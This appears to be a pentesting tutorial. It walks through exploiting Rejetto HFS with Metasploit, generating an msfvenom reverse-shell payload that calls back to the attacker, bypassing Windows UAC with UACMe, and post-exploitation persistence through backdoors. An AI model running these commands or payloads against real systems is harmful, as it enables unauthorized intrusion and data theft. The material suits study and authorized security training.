Bypassing UAC With UACMe

UAC (User Account Control)

• User Account Control (UAC) is a Windows security feature introduced in Windows Vista that is used to prevent unauthorized changes from being made to the operating system.

• UAC is used to ensure that changes to the operating system require approval from the administrator or a user account that is part of the local administrators group.

• A non-privileged user attempting to execute a program with elevated privileges will be prompted with the UAC credential prompt, whereas a privileged user will be prompted with a consent prompt.

• Attacks can bypass UAC in order to execute malicious executables with elevated privileges.

Bypassing UAC

• In order to successfully bypass UAC, we will need to have access to a user account that is a part of the local administrators group on the Windows target system.

• UAC allows a program to be executed with administrative privileges, consequently prompting the user for confirmation.

• UAC has various integrity levels ranging from low to high, if the UAC protection level is set below high, Windows programs can be executed with elevated privileges without prompting the user for confirmation.

• There are multiple tools and techniques that can be used to bypass UAC, however, the tool and technique used will depend on the version of Windows running on the target system.

Bypassing UAC With UACMe

• UACMe is an open source, robust privilege escalation tool developed by @hfire0x. It can be used to bypass Windows UAC by leveraging various techniques.
• The UACME GitHub repository contains a very well documented list of methods that can be used to bypass UAC on multiple versions of Windows ranging from Windows 7 to Windows 10.

• It allows attackers to execute malicious payloads on a Windows target with administrative/elevated privileges by abusing the inbuilt Windows AutoElevate tool.

• The UACMe GitHub repository has more than 60 exploits that can be used to bypass UAC depending on the version of Windows running on the target.

Attack Flow: Exploiting Rejetto and UAC Bypass for Privilege Escalation

1. Exploit the Vulnerable Rejetto Version

• Identify Vulnerable Rejetto Version: Confirm that the target server is running a vulnerable version of Rejetto (HTTP File Server).

• Exploit Using Metasploit:

  • Module: exploit/windows/http/rejetto_hfs_exec

  • Commands:

    Copy

    use exploit/windows/http/rejetto_hfs_exec
    set RHOSTS <target-ip>
    set LHOST <your-ip>
    set LPORT <your-port>
    exploit

• Outcome: Obtain a Meterpreter shell in a 32-bit (x86) environment.

2. Transition to a 64-bit (x64) Shell

• Identify the "explorer" Process ID:

  • Command:

    Copy

    ps

  • Find Process ID: Look for the explorer.exe process, which is usually a 64-bit process.

• Migrate to a 64-bit Process:

  • Command:

    Copy

    migrate <PID-of-explorer>

• Outcome: Transition from a 32-bit (x86) Meterpreter shell to a 64-bit (x64) Meterpreter shell.

3. Bypass UAC to Gain Administrative Privileges

After successfully exploiting the Rejetto vulnerability and obtaining a Meterpreter shell, you might encounter a User Account Control (UAC) prompt when trying to execute administrative commands. To bypass this prompt and elevate your privileges, follow these detailed steps:

3.1 Prepare UAC Bypass Tools

• Download UACMe Tool:

  • Purpose: This tool helps bypass the UAC prompt by leveraging specific Windows features and settings.

• Create Shell Code:

  • Definition: Shell code is a piece of code that performs specific actions on the target system. In this case, you will use a Meterpreter shell code that opens a connection back to your listener with elevated privileges.

  • Shell Code: This is a payload that you will upload to the target system and execute to establish a new Meterpreter session with administrative rights.

  Example:

  • Shell Code Generation:

    Copy

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=<your-port> -f exe > shellcode.exe

• Upload UACMe and Shell Code to Target System:

  • Commands:

    Copy

    upload <path-to-UACMe>
    upload <path-to-shell-code>

3.2 Execute UACMe to Bypass UAC

• Navigate to UACMe Directory:

  • Command:

    Copy

    cd <directory-containing-UACMe>

• Run UACMe to Perform UAC Bypass:

  • Command:

    Copy

    .\<UACMe-executable> <path-to-shell-code>

  Explanation:

  • UACMe uses the shell code you provided to execute a new Meterpreter session as an administrator, bypassing the UAC prompt.

  • The <UACMe-executable> is the actual executable file from the UACMe tool.

  • <path-to-shell-code> is the path where you uploaded your generated Meterpreter shell code.

• Outcome: This step will establish a new Meterpreter session with administrative privileges.

4. Verify Administrative Privileges

After successfully bypassing UAC and obtaining a new Meterpreter session with higher privileges:

• Check for Elevated Privileges:

  • Command:

    Copy

    whoami /priv

  Explanation:

  • This command lists the privileges of the current user. If the UAC bypass was successful, you should see administrative privileges in the output.

5. Further Actions After Privilege Escalation

With administrative privileges, you can perform a variety of post-exploitation tasks:

• Upload and Execute Additional Exploits:

  • Commands:

    Copy

    upload <path-to-additional-exploits>
    execute -f <exploit-file>

• Potential Actions:

  • Network Reconnaissance: Scan the network for other vulnerable systems or information.

  • Access Sensitive Data: Retrieve important files or data from the target system.

  • Persistence: Set up mechanisms to maintain access, such as creating new user accounts or installing backdoors.

Hacker's Mantra:As economic life relies more and more on the Internet, the potential for small bands of hackers to launch devastating attacks on the world economy is growing.” ― Evgeny Morozov